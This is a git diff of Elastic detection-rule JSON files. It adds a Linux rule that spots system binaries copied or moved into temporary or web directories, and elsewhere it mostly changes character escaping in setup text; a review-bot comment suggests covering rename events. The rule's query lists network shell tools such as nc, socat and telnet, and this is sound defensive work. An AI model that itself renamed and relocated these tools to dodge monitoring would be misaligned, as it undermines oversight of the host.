@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Binary Copied and/or Moved to Suspicious Directory", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.name in (\"cp\", \"mv\") and process.args : (\n // Shells\n \"/bin/*sh\", \"/usr/bin/*sh\", \n\n // Interpreters\n \"/bin/python*\", \"/usr/bin/python*\", \"/bin/php*\", \"/usr/bin/php*\", \"/bin/ruby*\", \"/usr/bin/ruby*\", \"/bin/perl*\",\n \"/usr/bin/perl*\", \"/bin/lua*\", \"/usr/bin/lua*\", \"/bin/java*\", \"/usr/bin/java*\", \n\n // Compilers\n \"/bin/gcc*\", \"/usr/bin/gcc*\", \"/bin/g++*\", \"/usr/bin/g++*\", \"/bin/cc\", \"/usr/bin/cc\",\n\n // Suspicious utilities\n \"/bin/nc\", \"/usr/bin/nc\", \"/bin/ncat\", \"/usr/bin/ncat\", \"/bin/netcat\", \"/usr/bin/netcat\", \"/bin/nc.openbsd\",\n \"/usr/bin/nc.openbsd\", \"/bin/*awk\", \"/usr/bin/*awk\", \"/bin/socat\", \"/usr/bin/socat\", \"/bin/openssl\",\n \"/usr/bin/openssl\", \"/bin/telnet\", \"/usr/bin/telnet\", \"/bin/mkfifo\", \"/usr/bin/mkfifo\", \"/bin/mknod\",\n \"/usr/bin/mknod\", \"/bin/ping*\", \"/usr/bin/ping*\", \"/bin/nmap\", \"/usr/bin/nmap\",\n\n // System utilities\n \"/bin/ls\", \"/usr/bin/ls\", \"/bin/cat\", \"/usr/bin/cat\", \"/bin/sudo\", \"/usr/bin/sudo\", \"/bin/curl\", \"/usr/bin/curl\",\n \"/bin/wget\", \"/usr/bin/wget\", \"/bin/tmux\", \"/usr/bin/tmux\", \"/bin/screen\", \"/usr/bin/screen\", \"/bin/ssh\",\n \"/usr/bin/ssh\", \"/bin/ftp\", 
\"/usr/bin/ftp\"\n ) and not process.parent.name in (\"dracut-install\", \"apticron\", \"generate-from-dir\", \"platform-python\")]\n [file where host.os.type == \"linux\" and event.action == \"creation\" and file.path : (\n \"/dev/shm/*\", \"/run/shm/*\", \"/tmp/*\", \"/var/tmp/*\", \"/run/*\", \"/var/run/*\", \"/var/www/*\", \"/proc/*/fd/*\"\n ) and not file.path : \"/tmp/rear*\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_1.json b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_1.json index 342d79a420d..5ba02ec8085 100644 --- a/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_1.json 
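Review bot: The second stage of the sequence in the new file's `query` only accepts `event.action == "creation"`, so a `mv` of a listed binary within the same filesystem — a rename rather than a new file — would presumably not produce a matching event, leaving the "Moved" half of the rule name and description without coverage; if Elastic Defend reports that as a `rename` action, `event.action in ("creation", "rename")` would close the gap, but this should be confirmed against the file event data before changing it. Until then a sentence in `description` stating that the file stage keys on file creation would set expectations for analysts. In the `setup` text the agent-policy link is pinned to `fleet/8.10/agent-policy.html` while the neighbouring links use `current`; `https://www.elastic.co/guide/en/fleet/current/agent-policy.html` would keep them consistent.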
@@ -42,7 +42,7 @@ ], "risk_score": 47, "rule_id": "fddff193-48a3-484d-8d35-90bb3d323a56", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_2.json b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_2.json index a0926b2bf87..8cb52ff0620 100644 --- a/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_2.json +++ b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_2.json 
@@ -41,7 +41,7 @@ ], "risk_score": 47, "rule_id": "fddff193-48a3-484d-8d35-90bb3d323a56", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_1.json b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_1.json index 3beb295c861..79ea57d994c 100644 --- a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_1.json 
@@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_2.json b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_2.json index 22cfe714f61..aa94672fa57 100644 --- a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_2.json +++ b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_2.json 
@@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_3.json b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_3.json index c10bae75bc8..df9c0210e11 100644 --- a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_3.json +++ b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_3.json 
@@ -45,7 +45,7 @@
 ],
 "risk_score": 21,
 "rule_id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -73,7 +73,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_104.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_104.json
index 352ee20851c..19edb4c0aca 100644
--- a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_104.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_105.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_105.json
index d4352b90964..54cf9bd2d4f 100644
--- a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_105.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_106.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_106.json
index c7efacaa31e..0b9e7ca314d 100644
--- a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_106.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_107.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_107.json
index 993bfce18ff..323aae3910a 100644
--- a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_107.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_108.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_108.json
index 2bcaa1b1660..d9de0602582 100644
--- a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_108.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_1.json b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_1.json
index d719b2a55f7..255a39a6a37 100644
--- a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_1.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_2.json b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_2.json
index b0a42b1c424..c82a0549c32 100644
--- a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_2.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -101,7 +101,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -116,7 +116,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/fec7ccb7-6ed9-4f98-93ab-d6b366b063a0_1.json b/packages/security_detection_engine/kibana/security_rule/fec7ccb7-6ed9-4f98-93ab-d6b366b063a0_1.json
index 23bc610259f..a3594709f0b 100644
--- a/packages/security_detection_engine/kibana/security_rule/fec7ccb7-6ed9-4f98-93ab-d6b366b063a0_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/fec7ccb7-6ed9-4f98-93ab-d6b366b063a0_1.json
@@ -87,7 +87,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -109,7 +109,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_104.json b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_104.json
index 38830be6d73..8e3286745fc 100644
--- a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_104.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -78,7 +78,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_105.json b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_105.json
index 650d151d8c3..28f57cb8d05 100644
--- a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_105.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_106.json b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_106.json
index 0c2cc03f539..7ddf7128199 100644
--- a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_106.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
